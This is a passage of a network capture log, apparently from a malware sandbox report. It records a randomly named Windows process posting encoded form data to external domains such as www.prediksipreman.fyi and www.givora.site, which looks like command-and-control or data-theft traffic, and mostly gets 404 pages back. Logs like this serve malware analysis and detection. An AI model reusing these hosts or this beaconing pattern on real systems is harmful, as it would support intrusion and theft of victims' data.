Nov 1, 2024 03:46:22.713216066 CET	1236	IN	Data Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34 Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
Nov 1, 2024 03:46:22.713428020 CET	636	IN	Data Raw: 2c b0 33 da 10 c0 a8 15 ba 69 cf c7 65 5c af 9b 80 a5 37 34 66 12 e2 a9 83 09 bd 5b 14 1d e9 67 27 7b 8b e8 9c bf 24 4e d8 02 17 20 3d 1e ee 44 98 68 32 7b 54 ec 23 0a a7 f3 06 4f 0f de 0a 4e 03 6d 4c a2 c0 35 cb a3 8a 58 ba db 4e ed ea 28 f5 eb Data Ascii: ,3ie\74f[g'{$N =Dh2{T#ONmL5XN("JUb2},$H0)fGHl(<z{x;:2Ng9KP4tfoYwUdnbz#vqPnnN*Hs2ev&4A1pe\|'4<z]dvV-NZ).RiAw
Nov 1, 2024 03:46:22.713440895 CET	893	IN	Data Raw: d0 cd d9 c9 8a 42 ab f5 84 84 f9 bd e9 34 1e 36 e1 3b c5 50 82 49 0a 49 07 aa d6 64 1f 16 6c 62 6b 24 e4 f6 b0 46 72 8a 96 e9 f1 36 a2 2c 12 8d ce a4 c7 65 43 d9 44 0a 4a 35 74 72 ae 72 5b 10 fb 22 ca 34 bd 54 53 c2 1d c7 0b 0a c3 58 76 da e5 81 Data Ascii: B46;PIIdlbk$Fr6,eCDJ5trr["4TSXv)J.Zp%gux6I]aq8L\\|zg>7i\|d$Gy'r\|oIR#W*o=-B_!w}tf`fY>}X^/s@=T^+L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49992	162.0.215.244	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:24.577418089 CET	1769	OUT	POST /3lre/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.prediksipreman.fyi Origin: http://www.prediksipreman.fyi Referer: http://www.prediksipreman.fyi/3lre/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 79 34 39 39 71 4c 68 48 69 56 4a 6f 53 57 54 4a 53 6b 45 59 32 73 32 67 33 30 41 51 73 75 79 42 33 77 7a 33 70 76 54 69 4a 67 41 33 36 71 37 54 4d 61 44 5a 6e 35 68 38 33 33 5a 30 36 77 48 6f 52 66 51 32 71 75 54 77 74 73 48 6a 52 6f 77 45 71 6f 6d 47 66 58 5a 46 66 58 34 4e 73 62 59 6a 75 55 6a 55 66 7a 50 76 47 79 51 68 58 78 57 6e 66 70 6a 6f 64 76 6b 47 6f 59 39 75 6c 69 62 55 42 42 30 37 35 39 59 39 6f 36 30 58 6c 75 2f 50 43 75 49 4d 61 67 62 43 39 75 4f 59 34 6f 59 42 4b 70 58 68 71 44 6a 77 7a 66 39 56 70 71 70 73 6e 63 6e 69 35 79 72 68 66 32 6c 36 77 75 7a 47 54 43 78 65 63 39 62 31 75 37 61 4e 48 6a 37 38 61 51 6f 7a 4b 6c 6d 70 39 32 38 52 4e 36 38 62 55 54 30 46 4f 2f 57 56 49 32 61 31 75 71 6c 4d 70 70 6a 56 35 34 5a 47 72 42 37 63 4d 39 57 36 72 31 39 4f 33 79 6d 71 62 45 41 45 4b 4b 4d 31 35 2f 56 56 78 6b 2f 65 33 6c 61 59 2b 33 41 66 41 50 51 37 6e 7a 4b 33 51 37 69 4e 64 6c 39 76 5a 45 43 2f 32 45 76 6f 36 70 2b 4d 31 38 35 5a 48 63 5a 35 39 55 77 49 7a 30 58 4c 77 43 4e [TRUNCATED] Data Ascii: nl=y499qLhHiVJoSWTJSkEY2s2g30AQsuyB3wz3pvTiJgA36q7TMaDZn5h833Z06wHoRfQ2quTwtsHjRowEqomGfXZFfX4NsbYjuUjUfzPvGyQhXxWnfpjodvkGoY9ulibUBB0759Y9o60Xlu/PCuIMagbC9uOY4oYBKpXhqDjwzf9Vpqpsncni5yrhf2l6wuzGTCxec9b1u7aNHj78aQozKlmp928RN68bUT0FO/WVI2a1uqlMppjV54ZGrB7cM9W6r19O3ymqbEAEKKM15/VVxk/e3laY+3AfAPQ7nzK3Q7iNdl9vZEC/2Evo6p+M185ZHcZ59UwIz0XLwCNVtpQaHKSD590RXGNnYtJ0B9U6qiySTtphWKjxb1blCRcBDfWNJJ6g41yB4Y+eG8r1ftDdPziAH5Dw3QX8oIqGG8KOoAi6qM9COXBQQxwnMa5UPh5DUHerwFd5Zb4Ya4qv0Kl73TgZ9bQFNFpTIR5LP/cr20BtzurtsANK0momc5hSsLFdnEzcSQ/snbM00oQHPTN1f3Fwlk4rzGOXHiEe6KkuIOLlu2hfKkK5Y/qwoy2HOckwHcNDYclOx14LS6R/tJ8fetZgvkEo2ypcf0IifrKEOfzHkzATIO6n6kg/MuLW/2kMYZvLsAcHPa3XL6QXzijWqOqTI8TsuWgf7+YeYA56uGIBClndsFkb7hXZa2cHBHf4Hlt1OSMf//2iifHyRbE9smi66K0GahCWZk3jgcEd2fB7bOz6eZaqHR43xZbb8EP+m5qESPG04WRqxNpjqf0BwZHgBFSm9xN9xIhMiKRZCJ7Y05+s4uUkO88MjlQPAW411+hmv1kjZExdjgQz13d+E0QbhOBQLcydy/F/YxrQHUNzwQeNu4RXqkYVWFkfIsKpKRdJmFV8SFELNqYZZ0NUVwyRRr6UiO72cqjpjxANeFPgfw0Xs4AtsWOwJtu1fDGxBSXcu+OikZOC6x/csCbJi74TBPG+ns/dgN0jEswS8frIiMlwq [TRUNCATED]
Nov 1, 2024 03:46:25.247807980 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 01 Nov 2024 02:46:25 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED] Data Ascii: 135BZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L46cTV@UiV#,:\|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~GylYXqfG}g}z@Jf]e7{.(r~tnWZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>nKou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a\|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
Nov 1, 2024 03:46:25.247859955 CET	1236	IN	Data Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia\|S\|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
Nov 1, 2024 03:46:25.247874975 CET	424	IN	Data Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34 Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
Nov 1, 2024 03:46:25.247946978 CET	1236	IN	Data Raw: d5 e1 7e a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b4 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 Data Ascii: ~cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]F9I?!S@kpF38'!6I;ywV4-"g)W3i$v#TsT2r,.,$p][YZL'939}Zv
Nov 1, 2024 03:46:25.248019934 CET	1100	IN	Data Raw: 78 3b ac 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 Data Ascii: x;uW$FNcYXp8.Y=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)Wf-%zO`XI(B46;PIIdl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49993	162.0.215.244	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:27.121200085 CET	472	OUT	GET /3lre/?nl=/6Vdp+1Y21llHWrnJFgTkMelxgdakbST517P2ezUMEZQpYm2I4KB95g+5G1ZwATxC5oRicPrlKz7UaUXu7WnWVF0YU8xlLcjqFiWcTqSDyUhRRfYLZXOVM1ZwNUIzk+NCQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.prediksipreman.fyi User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:46:27.801388979 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked date: Fri, 01 Nov 2024 02:46:27 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 32 37 38 36 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED] Data Ascii: 2786<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Nov 1, 2024 03:46:27.801420927 CET	1236	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
Nov 1, 2024 03:46:27.801434040 CET	1236	IN	Data Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
Nov 1, 2024 03:46:27.801558971 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
Nov 1, 2024 03:46:27.801578045 CET	1236	IN	Data Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34 Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
Nov 1, 2024 03:46:27.801592112 CET	1060	IN	Data Raw: 70 34 56 46 69 4c 38 57 4d 2f 43 6c 38 53 46 34 70 67 74 68 76 74 48 6d 34 71 51 55 49 69 51 64 59 2b 35 4e 4d 66 75 2f 32 32 38 50 6b 71 33 4e 5a 4e 4d 71 44 31 57 37 72 4d 6e 72 77 4a 65 51 45 6d 49 77 4b 73 61 63 4d 49 2f 54 56 4f 4c 6c 48 6a Data Ascii: p4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFtt
Nov 1, 2024 03:46:27.801862955 CET	1236	IN	Data Raw: 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52 47 36 31 65 72 58 50 42 4f 66 4f 36 48 4e 37 55 59 6c 4a 6d 75 73 6c 70 57 44 55 54 64 59 61 62 34 4c 32 Data Ascii: URFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGX
Nov 1, 2024 03:46:27.801875114 CET	1236	IN	Data Raw: 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 Data Ascii: } .status-reason { font-size: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code"
Nov 1, 2024 03:46:27.801884890 CET	636	IN	Data Raw: 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 73 65 72 76 65 72 22 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: </li> <li class="info-server"></li> </ul> </div> </div> </section> <footer> <div class="container"> <a href="http://cpan

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49994	162.0.231.203	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:32.896075010 CET	711	OUT	POST /855d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.givora.site Origin: http://www.givora.site Referer: http://www.givora.site/855d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 37 44 63 6b 53 47 50 49 41 30 45 67 70 64 78 67 64 64 55 6a 67 50 48 64 77 47 4c 6a 43 55 61 30 4b 6e 35 53 58 44 32 6a 34 6a 4d 61 42 6b 76 35 34 78 61 4a 62 37 53 65 39 75 73 51 6a 5a 57 36 6c 2b 67 70 61 38 33 57 37 30 53 54 78 66 38 32 35 72 49 46 37 38 55 2f 74 68 43 36 67 65 4b 7a 78 64 4c 59 77 35 47 45 37 75 45 4e 42 53 2f 42 64 53 57 52 6d 35 75 51 6e 71 47 2f 78 42 77 49 57 42 52 59 56 57 6a 46 56 42 33 43 2b 53 53 45 65 63 74 42 37 35 6b 4a 53 62 37 41 78 72 7a 65 34 51 43 39 31 52 38 39 78 35 4b 35 39 48 38 69 41 37 30 77 67 45 68 68 46 36 6e 33 58 5a 76 57 4a 4a 74 79 64 37 6b 3d Data Ascii: nl=7DckSGPIA0EgpdxgddUjgPHdwGLjCUa0Kn5SXD2j4jMaBkv54xaJb7Se9usQjZW6l+gpa83W70STxf825rIF78U/thC6geKzxdLYw5GE7uENBS/BdSWRm5uQnqG/xBwIWBRYVWjFVB3C+SSEectB75kJSb7Axrze4QC91R89x5K59H8iA70wgEhhF6n3XZvWJJtyd7k=
Nov 1, 2024 03:46:33.607049942 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:46:33 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49995	162.0.231.203	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:35.441714048 CET	731	OUT	POST /855d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.givora.site Origin: http://www.givora.site Referer: http://www.givora.site/855d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 37 44 63 6b 53 47 50 49 41 30 45 67 6f 38 42 67 66 2b 38 6a 77 66 48 65 7a 47 4c 6a 5a 45 61 6f 4b 6e 31 53 58 43 43 7a 35 56 55 61 42 41 72 35 2f 77 61 4a 59 37 53 65 31 4f 74 61 2b 4a 57 68 6c 2b 63 50 61 38 4c 57 37 30 75 54 78 62 34 32 2b 63 38 47 36 73 55 39 69 42 43 34 71 2b 4b 7a 78 64 4c 59 77 34 6d 69 37 71 51 4e 42 44 50 42 48 7a 57 53 6c 35 75 54 67 71 47 2f 6d 52 77 4d 57 42 52 66 56 54 65 51 56 43 66 43 2b 51 36 45 65 6f 35 43 78 35 6b 4c 63 37 36 74 35 4b 75 56 69 51 2b 61 2f 6e 70 34 77 5a 58 4d 38 78 4e 49 61 5a 38 59 7a 6b 4e 5a 56 70 76 41 47 70 4f 2f 54 71 39 43 44 73 78 59 5a 54 59 64 6b 30 41 47 4a 50 77 4c 76 56 63 52 4e 75 72 6c Data Ascii: nl=7DckSGPIA0Ego8Bgf+8jwfHezGLjZEaoKn1SXCCz5VUaBAr5/waJY7Se1Ota+JWhl+cPa8LW70uTxb42+c8G6sU9iBC4q+KzxdLYw4mi7qQNBDPBHzWSl5uTgqG/mRwMWBRfVTeQVCfC+Q6Eeo5Cx5kLc76t5KuViQ+a/np4wZXM8xNIaZ8YzkNZVpvAGpO/Tq9CDsxYZTYdk0AGJPwLvVcRNurl
Nov 1, 2024 03:46:36.153080940 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:46:36 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49996	162.0.231.203	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
